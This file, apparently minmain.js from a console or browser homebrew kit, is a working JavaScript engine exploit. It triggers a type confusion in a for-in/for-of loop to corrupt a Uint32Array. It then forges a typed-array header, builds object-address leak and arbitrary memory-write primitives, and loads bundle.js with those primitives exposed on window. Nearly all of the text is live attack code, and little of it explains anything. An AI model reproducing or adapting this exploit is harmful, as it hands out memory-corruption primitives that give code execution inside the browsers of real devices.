minmain.js

/* eslint no-redeclare: "off" */
/* eslint no-unmodified-loop-condition: "off" */
/* global XMLHttpRequest, alert, ImageData, postMessage, history */
function send (ep, data) {
	var msg = {
		msg: data
	};
	var jsonstr = JSON.stringify(msg);
	try {
		var xhr = new XMLHttpRequest();
		xhr.open('POST', '/' + ep, false);
		xhr.setRequestHeader('Content-Type', 'application/json');
		xhr.send(jsonstr);
	} catch (e) {

	}
}

function log (msg) {
	send('log', msg === undefined ? 'undefined' : msg.toString());
}

window.onerror = function (msg, url, line) {
	if (msg === 'Out of memory') { alert(msg); }
	send('error', [line, msg]);
	//	location.reload();
};

var _dview;
function u2d (low, hi) {
	if (!_dview) _dview = new DataView(new ArrayBuffer(8));
	_dview.setUint32(0, low, true);
	_dview.setUint32(4, hi, true);
	return _dview.getFloat64(0, true);
}

window.minmain = function minmain () {
	window.arr = new Uint32Array(0x2000);
	arr[4] = 0xb0;

	var obj = {};
	for (var i in {foo: 'bar'}) {
		for (i of [arr]) {
		}
		obj[i];
	}

	var objs = [];
	for (var i = 0; i < 2; ++i) {
		objs.push({
			prop_0: 0, prop_1: 0xdead,
			prop_2: 0, prop_3: 0,
			prop_4: 0, prop_5: 0,
			prop_6: 0, prop_7: 0,
		});
	}

	for (var i = 0; i < (arr.length - 21); ++i) {
		if (arr[i] == 0xdead && arr[i+1] == 0xffff0000) {
			var objs_1_off = i - 6;
			var objs_0_off = objs_1_off + 20;
			break;
		}
	}

	if (typeof objs_1_off === 'undefined') {
		log('Could not locate our objects...');
		alert("The exploit failed to launch. Exit to the HOME menu and try again.");
		window.showExitMessage();
		return;
	}

	arr[objs_0_off+0] = 0x00000064;
	arr[objs_0_off+1] = 0x01602400;
	arr[objs_0_off+7] = 0;
  
	while (!(objs[0] instanceof Uint32Array)) {
		if (++arr[objs_0_off] >= 0x10000) {
			log('Could not find structure ID...');
			return;
		}
	}

	function leak_obj(obj) {
		objs[1].prop_0 = obj;
		return [arr[objs_1_off+4], arr[objs_1_off+5]];
	}

	function write(addr, word, off) {
		off = off >> 2;
	
		arr[objs_0_off+4] = addr[0];
		arr[objs_0_off+5] = addr[1];
		arr[objs_0_off+6] = off + 1;
	
		objs[0][off] = word;
	}

	var view_a = new Uint32Array(0);
	var fobj_a = new Uint32Array(0);
	var fobj_b = { b: 0 };

	var view_a_addr = leak_obj(view_a); 
	var view_a_vect = leak_obj(fobj_a);

	write(view_a_addr, view_a_vect[0], 0x10);
	write(view_a_addr, view_a_vect[1], 0x14);
	write(view_a_addr, 8, 0x18);
	write(view_a_addr, 1, 0x1c);
  
	view_a[7] = 1;

	log('Success!'); 
 
	loadRun({
		va: view_a,
		vb: fobj_a,
		leakee: fobj_b,
		leakaddr: leak_obj(fobj_b),
	});
};

function loadRun (obj) {
	window.exploitMe = obj;
	var elem = document.createElement('script');
	elem.setAttribute('src', 'bundle.js');
	document.body.appendChild(elem);
}